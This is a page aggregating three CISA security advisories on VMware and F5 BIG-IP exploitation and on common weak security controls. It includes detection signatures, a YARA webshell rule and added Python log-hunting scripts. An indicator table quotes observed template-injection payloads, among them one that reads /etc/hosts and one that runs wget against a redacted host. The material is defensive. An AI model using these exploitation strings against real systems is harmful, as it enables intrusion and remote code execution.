Feed aggregator

AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control

US-CERT Security Alerts - Wed, 05/18/2022 - 10:00
Original release date: May 18, 2022 | Last revised: May 19, 2022
Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). 

VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5 and May 6, 2022, respectively.

Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including indicators of compromise (IOCs)—about observed exploitation at multiple other large organizations from trusted third parties.

This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 232kb).

For a downloadable copy of IOCs, see AA22-138B.stix

Technical Details

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.

  • CVE-2022-22954 enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[1]
    • VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • VMware Cloud Foundation, 4.x
    • vRealize Suite LifeCycle Manager, 8.
  • CVE-2022-22960 enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[2]
    • VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • vRA, version 7.6 
    • VMware Cloud Foundation, 3.x, 4.x
    • vRealize Suite LifeCycle Manager, 8.x

According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.

Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.

Detection Methods

Signatures

Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.

The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:

alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content: "GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954; reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)

The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection";content:"GET"; http_method; content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:10000001;rev:1;)

The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:

rule dingo_jspy_webshell
{
    strings:
        $string1 = "dingo.length"
        $string2 = "command = command.trim"
        $string3 = "commandAction"
        $string4 = "PortScan"
        $string5 = "InetAddress.getLocalHost"
        $string6 = "DatabaseManager"
        $string7 = "ExecuteCommand"
        $string8 = "var command = form.command.value"
        $string9 = "dingody.iteye.com"
        $string10 = "J-Spy ver"
        $string11 = "no permission ,die"
        $string12 = "int iPort = Integer.parseInt"
    condition:
        filesize < 50KB and 12 of ($string*)
}

Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.

Behavioral Analysis and Indicators of Compromise

Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:

  • Using the indicators listed in table 1 to detect potential malicious activity.
  • Reviewing systems logs and gaps in logs.
  • Reviewing abnormal connections to other assets.
  • Searching the command-line history.
  • Auditing running processes.
  • Reviewing local user accounts and groups.  
  • Auditing active listening ports and connections.

 

Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960

| Type | Indicator | Comment |
| --- | --- | --- |
| IP Addresses | 136.243.75[.]136 | On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations. |
| Scanning, Exploitation Strings, and Commands Observed | catalog-portal/ui/oauth/verify | |
| Scanning, Exploitation Strings, and Commands Observed | catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat  /etc/hosts")} | |
| Scanning, Exploitation Strings, and Commands Observed | /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget  -U "Hello 1.0" -qO - http://[REDACTED]/one")} | |
| Scanning, Exploitation Strings, and Commands Observed | freemarker.template.utility.Execute | Search for this function in: opt/vmware/horizon/workspace/logs/greenbox_web.log. freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands. |
| Scanning, Exploitation Strings, and Commands Observed | /opt/vmware/certproxy/bing/certproxyService.sh | Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root. |
| Scanning, Exploitation Strings, and Commands Observed | /horizon/scripts/exportCustomGroupUsers.sh | Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root. |
| Scanning, Exploitation Strings, and Commands Observed | /horizon/scripts/extractUserIdFromDatabase.sh | Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root. |
| Files | horizon.jsp | Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib |
| Files | jquery.jsp | Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib |
| Webshells | jspy | |
| Webshells | godzilla | |
| Webshells | tomcatjsp | |
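One way to hunt for the Table 1 request indicators in exported log lines, shown as an added example that is not CISA's or VMware's code. It goes slightly beyond the table by percent-decoding each line first, so encoded and double-encoded forms of the same strings are caught; the log line layout, the sample lines and the verdict names are assumptions constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from Table 1 and the two Snort signatures in this advisory.
VERIFY_PATH = "catalog-portal/ui/oauth/verify"
SSTI_MARKER = "freemarker.template.utility.execute"  # lower-cased; the rule uses nocase
IOC_IPS = {"136.243.75.136"}  # listed defanged in Table 1

# Captures the command string handed to Execute: ...Execute"?new()("<command>")
CMD_RE = re.compile(r'execute"?\s*\?\s*new\(\)\s*\(\s*"(.*?)"\s*\)', re.I | re.S)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def normalise(line, max_rounds=3):
    """Percent-decode until stable so encoded and double-encoded requests match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(line)
        if decoded == line:
            break
        line = decoded
    return line


def classify(line):
    """Return a finding for one log line, or None when no indicator is present."""
    text = normalise(line)
    lowered = text.lower()
    on_verify = VERIFY_PATH in lowered
    has_execute = SSTI_MARKER in lowered
    ioc_ips = sorted(set(IP_RE.findall(text)) & IOC_IPS)
    if not (on_verify or has_execute or ioc_ips):
        return None
    if on_verify and has_execute:
        verdict = "template-injection"   # exploitation string from Table 1
    elif has_execute:
        verdict = "execute-reference"    # may be legitimate; needs review
    elif on_verify:
        verdict = "verify-request"       # endpoint touched, no payload seen
    else:
        verdict = "ioc-ip-only"
    match = CMD_RE.search(text) if has_execute else None
    return {
        "verdict": verdict,
        "command": match.group(1) if match else None,  # what the actor tried to run
        "ioc_ips": ioc_ips,
    }


def hunt(lines):
    """Scan an iterable of log lines; return (line_number, finding) pairs."""
    hits = []
    for number, line in enumerate(lines, start=1):
        finding = classify(line)
        if finding:
            hits.append((number, finding))
    return hits


# Constructed sample lines (not real greenbox_web.log output; the layout is assumed).
SAMPLE_LOG = [
    '2022-04-12 09:14:02 INFO 10.0.0.15 GET /SAAS/auth/login 200',
    '2022-04-12 09:13:55 INFO 198.51.100.7 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=abc123 200',
    '2022-04-12 09:15:40 WARN 136.243.75.136 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")} 400',
    '2022-04-12 09:15:52 WARN 198.51.100.7 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20%2Fetc%2Fhosts%22%29%7D 400',
    '2022-04-12 09:15:58 WARN 198.51.100.7 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%2528%2529%2528'
    '%2522cat%2520%252Fetc%252Fhosts%2522%2529%257D 400',
    '2022-04-12 09:16:02 ERROR template processing failed near freemarker.template.utility.Execute',
]

if __name__ == "__main__":
    for number, finding in hunt(SAMPLE_LOG):
        print(number, finding)
```

The extracted command field gives responders a starting point for the command-line history and process review listed above; an "execute-reference" hit still needs manual review because the advisory notes the function may appear legitimately.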

 

Incident Response

If administrators discover system compromise, CISA recommends they:

  1. Immediately isolate affected systems. 
  2. Collect and review relevant logs, data, and artifacts.
  3. Consider soliciting support from a third-party incident response organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
  4. Report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Mitigations

CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.

Contact Information

CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Revisions
  • Initial Version: May 18, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-138A: Threat Actors Exploiting F5 BIG-IP CVE-2022-1388

US-CERT Security Alerts - Wed, 05/18/2022 - 05:00
Original release date: May 18, 2022
Summary

Actions for administrators to take today:
• Do not expose management interfaces to the internet.
• Enforce multi-factor authentication.
• Consider using CISA’s Cyber Hygiene Services.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2022-1388. This recently disclosed vulnerability in certain versions of F5 Networks, Inc., (F5) BIG-IP enables an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses. F5 released a patch for CVE-2022-1388 on May 4, 2022, and proof of concept (POC) exploits have since been publicly released, enabling less sophisticated actors to exploit the vulnerability. Due to previous exploitation of F5 BIG-IP vulnerabilities, CISA and MS-ISAC assess unpatched F5 BIG-IP devices are an attractive target; organizations that have not applied the patch are vulnerable to actors taking control of their systems.

According to public reporting, there is active exploitation of this vulnerability, and CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks. CISA and MS-ISAC strongly urge users and administrators to remain aware of the ramifications of exploitation and use the recommendations in this CSA—including upgrading their software to fixed versions—to help secure their organization’s systems against malicious cyber operations. Additionally, CISA and MS-ISAC strongly encourage administrators to deploy the signatures included in this CSA to help determine whether their systems have been compromised. CISA and MS-ISAC especially encourage organizations who did not patch immediately or whose F5 BIG-IP device management interface has been exposed to the internet to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 500kb).

Technical Details

CVE-2022-1388 is a critical iControl REST authentication bypass vulnerability affecting the following versions of F5 BIG-IP:[1]

  • 16.1.x versions prior to 16.1.2.2 
  • 15.1.x versions prior to 15.1.5.1 
  • 14.1.x versions prior to 14.1.4.6 
  • 13.1.x versions prior to 13.1.5 
  • All 12.1.x and 11.6.x versions

An unauthenticated actor with network access to the BIG-IP system through the management port or self IP addresses could exploit the vulnerability to execute arbitrary system commands, create or delete files, or disable services. F5 released a patch for CVE-2022-1388 for all affected versions—except 12.1.x and 11.6.x versions—on May 4, 2022 (12.1.x and 11.6.x versions are end of life [EOL], and F5 has stated they will not release patches).[2]

POC exploits for this vulnerability have been publicly released, and on May 11, 2022, CISA added this vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. Due to the POCs and ease of exploitation, CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices in government and private networks.

Detection Methods

CISA recommends administrators, especially of organizations who did not immediately patch, to:

  • See the F5 Security Advisory K23605346 for indicators of compromise. 
  • See the F5 guidance K11438344 if you suspect a compromise. 
  • Deploy the following CISA-created Snort signature:
alert tcp any any -> any $HTTP_PORTS (msg:"BIG-IP F5 iControl:HTTP POST URI '/mgmt/tm/util/bash' and content data 'command' and 'utilCmdArgs':CVE-2022-1388"; sid:1; rev:1; flow:established,to_server; flowbits:isnotset,bigip20221388.tagged; content:"POST"; http_method; content:"/mgmt/tm/util/bash"; http_uri; content:"command"; http_client_body; content:"utilCmdArgs"; http_client_body; flowbits:set,bigip20221388.tagged; tag:session,10,packets; reference:cve,2022-1388; reference:url,github.com/alt3kx/CVE-2022-1388_PoC; priority:2; metadata:service http;)

Additional resources to detect possible exploitation or compromise are identified below:

  • Emerging Threats suricata signatures. Note: CISA and MS-ISAC have verified these signatures are successful in detection of both inbound exploitation attempts (SID: 2036546) as well as post exploitation, indicating code execution (SID: 2036547).
    • SID 2036546
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE 2022-1388) M1"; flow:established,to_server; content:"POST"; http_method; content:"/mgmt/tm/util/bash"; http_uri; fast_pattern; content:"Authorization|3a 20|Basic YWRtaW46"; http_header; content:"command"; http_client_body; content:"run"; http_client_body; distance:0; content:"utilCmdArgs"; http_client_body; distance:0; http_connection; content:"x-F5-Auth-Token"; nocase; http_header_names; content:!"Referer"; content:"X-F5-Auth-Token"; flowbits:set,ET.F5AuthBypass; reference:cve,2022-1388; classtype:trojan-activity; sid:2036546; rev:2; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;)
    • SID 2036547
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE 2022-1388)"; flow:established,to_client; flowbits:isset,ET.F5AuthBypass; content:"200"; http_stat_code; file_data; content:"kind"; content:"tm|3a|util|3a|bash|3a|runstate"; fast_pattern; distance:0; content:"command"; distance:0; content:"run"; distance:0; content:"utilCmdArgs"; distance:0; content:"commandResult"; distance:0; reference:cve,2022-1388; classtype:trojan-activity; sid:2036547; rev:1; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;)
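The request/response pairing that the signatures above express with flowbits can be reproduced over decrypted HTTP transaction records to separate attempts from confirmed command execution. This is an added example, not CISA, MS-ISAC or Emerging Threats code: the event record layout and sample events are constructed, and as an assumption it gates on the CISA rule's request conditions while confirming with the response conditions of SID 2036547.

```python
BASH_URI = "/mgmt/tm/util/bash"

# Ordered contents of SID 2036547 ("|3a|" in the rule is a colon).
RESPONSE_CHAIN = [
    "kind", "tm:util:bash:runstate", "command", "run", "utilCmdArgs", "commandResult",
]


def contains_in_order(data, needles):
    """True when each needle occurs after the end of the previous one (distance:0)."""
    pos = 0
    for needle in needles:
        found = data.find(needle, pos)
        if found < 0:
            return False
        pos = found + len(needle)
    return True


def request_hit(event):
    """Request conditions of the CISA rule: POST, URI, and both body fields."""
    body = event.get("body", "")
    return (
        event["method"] == "POST"
        and BASH_URI in event["uri"]
        and "command" in body
        and "utilCmdArgs" in body
    )


def response_hit(event):
    """Response conditions of SID 2036547: HTTP 200 and the ordered body contents."""
    return event["status"] == 200 and contains_in_order(event.get("body", ""), RESPONSE_CHAIN)


def correlate(events):
    """Return {flow_id: 'attempt' | 'executed'} for flows whose request matched.

    A response is only evaluated when the same flow was already flagged by its
    request, which mirrors flowbits:set on the request and flowbits:isset on
    the response.
    """
    verdicts = {}
    for event in events:
        flow = event["flow"]
        if event["type"] == "request":
            if request_hit(event):
                verdicts.setdefault(flow, "attempt")
        elif flow in verdicts and response_hit(event):
            verdicts[flow] = "executed"
    return verdicts


# Constructed sample events (hypothetical record layout; argument values redacted).
SAMPLE_EVENTS = [
    {"type": "request", "flow": "flow-a", "method": "POST", "uri": "/mgmt/tm/util/bash",
     "body": '{"command":"run","utilCmdArgs":"[REDACTED]"}'},
    {"type": "response", "flow": "flow-a", "status": 200,
     "body": '{"kind":"tm:util:bash:runstate","command":"run",'
             '"utilCmdArgs":"[REDACTED]","commandResult":"[REDACTED]"}'},
    {"type": "request", "flow": "flow-b", "method": "POST", "uri": "/mgmt/tm/util/bash",
     "body": '{"command":"run","utilCmdArgs":"[REDACTED]"}'},
    {"type": "response", "flow": "flow-b", "status": 401,
     "body": '{"code":401,"message":"Authorization failed"}'},
    {"type": "request", "flow": "flow-c", "method": "GET", "uri": "/mgmt/tm/sys/version",
     "body": ""},
    {"type": "response", "flow": "flow-c", "status": 200, "body": '{"kind":"tm:sys:version"}'},
    {"type": "request", "flow": "flow-d", "method": "POST", "uri": "/mgmt/tm/util/bash",
     "body": '{"command":"run"}'},
]

if __name__ == "__main__":
    for flow, verdict in correlate(SAMPLE_EVENTS).items():
        print(flow, verdict)
```

An "executed" verdict corresponds to the post-exploitation case the advisory describes and calls for the incident response steps below; an "attempt" on an internet-reachable management interface is still a lead to triage.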

 

Incident Response 

If an organization’s IT security personnel discover system compromise, CISA and MS-ISAC recommend they:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Limit access to the management interface to the fullest extent possible.
  5. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  6. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722).

See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and MS-ISAC also encourage government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response. 

Mitigations

CISA and MS-ISAC recommend organizations:

  • Upgrade F5 BIG-IP software to fixed versions; organizations using versions 12.1.x and 11.6.x should upgrade to supported versions. 
  • If unable to immediately patch, implement F5’s temporary workarounds:
    • Block iControl REST access through the self IP address.
    • Block iControl REST access through the management interface.
    • Modify the BIG-IP httpd configuration. 

See F5 Security Advisory K23605346 for more information on how to implement the above workarounds. 

CISA and MS-ISAC also recommend organizations apply the following best practices to reduce risk of compromise:

  • Maintain and test an incident response plan.
  • Ensure your organization has a vulnerability program in place and that it prioritizes patch management and vulnerability scanning. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all SLTT organizations and public and private sector critical infrastructure organizations: https://www.cisa.gov/cyber-hygiene-services.
  • Properly configure and secure internet-facing network devices.
    • Do not expose management interfaces to the internet.
    • Disable unused or unnecessary network ports and protocols.
    • Disable/remove unused network services and devices.
  • Adopt zero-trust principles and architecture, including:
    • Micro-segmenting networks and functions to limit or block lateral movements.
    • Enforcing multifactor authentication (MFA) for all users and VPN connections.
    • Restricting access to trusted devices and users on the networks.

Revisions
  • Initial Version: May 18, 2022


AA22-137A: Weak Security Controls and Practices Routinely Exploited for Initial Access

US-CERT Security Alerts - Tue, 05/17/2022 - 05:00
Original release date: May 17, 2022
Summary

Best Practices to Protect Your Systems:
• Control access.
• Harden Credentials.
• Establish centralized log management.
• Use antivirus solutions.
• Employ detection tools.
• Operate services exposed on internet-accessible hosts with secure configurations.
• Keep software updated.

Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States,[1],[2],[3] Canada,[4] New Zealand,[5],[6] the Netherlands,[7] and the United Kingdom.[8]

Download the PDF version of this report (pdf, 430kb).

Technical Details

Malicious actors commonly use the following techniques to gain initial access to victim networks.[TA0001]

Malicious cyber actors often exploit the following common weak security controls, poor configurations, and poor security practices to employ the initial access techniques.

  • Multifactor authentication (MFA) is not enforced. MFA, particularly for remote desktop access, can help prevent account takeovers. With Remote Desktop Protocol (RDP) as one of the most common infection vectors for ransomware, MFA is a critical tool in mitigating malicious cyber activity. Do not exclude any user, particularly administrators, from an MFA requirement.
  • Incorrectly applied privileges or permissions and errors within access control lists. These mistakes can prevent the enforcement of access control rules and could allow unauthorized users or system processes to be granted access to objects. 
  • Software is not up to date. Unpatched software may allow an attacker to exploit publicly known vulnerabilities to gain access to sensitive information, launch a denial-of-service attack, or take control of a system. This is one of the most commonly found poor security practices.
  • Use of vendor-supplied default configurations or default login usernames and passwords. Many software and hardware products come “out of the box” with overly permissive factory-default configurations intended to make the products user-friendly and reduce the troubleshooting time for customer service. However, leaving these factory default configurations enabled after installation may provide avenues for an attacker to exploit. Network devices are also often pre-configured with default administrator usernames and passwords to simplify setup. These default credentials are not secure—they may be physically labeled on the device or even readily available on the internet. Leaving these credentials unchanged creates opportunities for malicious activity, including gaining unauthorized access to information and installing malicious software. Network defenders should also be aware that the same considerations apply for extra software options, which may come with preconfigured default settings.
  • Remote services, such as a virtual private network (VPN), lack sufficient controls to prevent unauthorized access. During recent years, malicious threat actors have been observed targeting remote services. Network defenders can reduce the risk of remote service compromise by adding access control mechanisms, such as enforcing MFA, implementing a boundary firewall in front of a VPN, and leveraging intrusion detection system/intrusion prevention system sensors to detect anomalous network activity.  
  • Strong password policies are not implemented. Malicious cyber actors can use a myriad of methods to exploit weak, leaked, or compromised passwords and gain unauthorized access to a victim system. Malicious cyber actors have used this technique in various nefarious acts and prominently in attacks targeting RDP. 
  • Cloud services are unprotected. Misconfigured cloud services are common targets for cyber actors. Poor configurations can allow for sensitive data theft and even cryptojacking.
  • Open ports and misconfigured services are exposed to the internet. This is one of the most common vulnerability findings. Cyber actors use scanning tools to detect open ports and often use them as an initial attack vector. Successful compromise of a service on a host could enable malicious cyber actors to gain initial access and use other tactics and procedures to compromise exposed and vulnerable entities. RDP, Server Message Block (SMB), Telnet, and NetBIOS are high-risk services. 
  • Failure to detect or block phishing attempts. Cyber actors send emails with malicious macros—primarily in Microsoft Word documents or Excel files—to infect computer systems. Initial infection can occur in a variety of ways, such as when a user opens or clicks a malicious download link, PDF, or macro-enabled Microsoft Word document included in phishing emails. 
  • Poor endpoint detection and response. Cyber actors use obfuscated malicious scripts and PowerShell attacks to bypass endpoint security controls and launch attacks on target devices. These techniques can be difficult to detect and protect against. 

Mitigations

Applying the following practices can help organizations strengthen their network defenses against common exploited weak security controls and practices.

Control Access
  • Adopt a zero-trust security model that eliminates implicit trust in any one element, node, or service, and instead requires continuous verification of the operational picture via real-time information from multiple sources to determine access and other system responses.[9],[10] Zero-trust architecture enables granular privilege access management and can allow users to be assigned only the rights required to perform their assigned tasks.
  • Limit the ability of a local administrator account to log in from a remote session (e.g., deny access to this computer from the network) and prevent access via an RDP session. Additionally, use dedicated administrative workstations for privileged user sessions to help limit exposure to all the threats associated with device or user compromise. 
  • Control who has access to your data and services. Give personnel access only to the data, rights, and systems they need to perform their job. This role-based access control, also known as the principle of least privilege, should apply to both accounts and physical access. If a malicious cyber actor gains access, access control can limit the actions malicious actors can take and can reduce the impact of misconfigurations and user errors. Network defenders should also use this role-based access control to limit the access of service, machine, and functional accounts, as well as the use of management privileges, to what is necessary. Consider the following when implementing access control models:
    • Ensure that access to data and services is specifically tailored to each user, with each employee having their own user account. 
    • Give employees access only to the resources needed to perform their tasks.
    • Change default passwords of equipment and systems upon installation or commissioning. 
    • Ensure there are processes in place for the entry, exit, and internal movement of employees. Delete unused accounts, and immediately remove access to data and systems from accounts of exiting employees who no longer require access. Deactivate service accounts, and activate them only when maintenance is performed.[11]
  • Harden conditional access policies. Review and optimize VPN and access control rules to manage how users connect to the network and cloud services.
  • Verify that all machines, including cloud-based virtual machine instances, do not have open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.[12]

Implement Credential Hardening

Establish Centralized Log Management
  • Ensure that each application and system generates sufficient log information. Log files play a key role in detecting attacks and dealing with incidents. By implementing robust log collection and retention, organizations are able to have sufficient information to investigate incidents and detect threat actor behavior. Consider the following when implementing log collection and retention: 
    • Determine which log files are required. These files can pertain to system logging, network logging, application logging, and cloud logging. 
    • Set up alerts where necessary. These should include notifications of suspicious login attempts based on an analysis of log files. 
    • Ensure that your systems store log files in a usable file format, and that the recorded timestamps are accurate and set to the correct time zone. 
    • Forward logs off local systems to a centralized repository or security information and event management (SIEM) tools. Robustly protect SIEM tools with strong account and architectural safeguards.
    • Make a decision regarding the retention period of log files. If you keep log files for a long time, you can refer to them to determine facts long after incidents occur. On the other hand, log files may contain privacy-sensitive information and take up storage space. Limit access to log files and store them in a separate network segment. An incident investigation will be nearly impossible if attackers have been able to modify or delete the logfiles.[13]
Employ Antivirus Programs
  • Deploy an anti-malware solution on workstations to prevent spyware, adware, and malware as part of the operating system security baseline.
  • Monitor antivirus scan results on a routine basis.
Employ Detection Tools and Search for Vulnerabilities
  • Implement endpoint and detection response tools. These tools allow a high degree of visibility into the security status of endpoints and can help effectively protect against malicious cyber actors.
  • Employ an intrusion detection system or intrusion prevention system to protect network and on-premises devices from malicious activity. Use signatures to help detect malicious network activity associated with known threat activity.
  • Conduct penetration testing to identify misconfigurations. See the Additional Resources section below for more information about CISA’s free cyber hygiene services, including remote penetration testing.
  • Conduct vulnerability scanning to detect and address application vulnerabilities. 
  • Use cloud service provider tools to detect overshared cloud storage and monitor for abnormal accesses.
Maintain Rigorous Configuration Management Programs
  • Always operate services exposed on internet-accessible hosts with secure configurations. Never enable external access without compensating controls such as boundary firewalls and segmentation from other more secure and internal hosts like domain controllers. Continuously assess the business and mission need of internet-facing services. Follow best practices for security configurations, especially blocking macros in documents from the internet.[14]
Initiate a Software and Patch Management Program 
  • Implement asset and patch management processes to keep software up to date. Identify and mitigate unsupported, end-of-life, and unpatched software and firmware by performing vulnerability scanning and patching activities. Prioritize patching known exploited vulnerabilities.
Additional Resources
References

[1] United States Cybersecurity and Infrastructure Security Agency 
[2] United States Federal Bureau of Investigation
[3] United States National Security Agency
[4] Canadian Centre for Cyber Security 
[5] New Zealand National Cyber Security Centre 
[6] New Zealand CERT NZ
[7] Netherlands National Cyber Security Centre
[8] United Kingdom National Cyber Security Centre 
[9] White House Executive Order on Improving the Nation’s Cybersecurity
[10] NCSC-NL Factsheet: Prepare for Zero Trust
[11] NCSC-NL Guide to Cyber Security Measures
[12] N-able Blog: Intrusion Detection System (IDS): Signature vs. Anomaly-Based
[13] NCSC-NL Guide to Cyber Security Measures
[14] National Institute of Standards and Technology SP 800-123 – Keeping Servers Secured

Contact

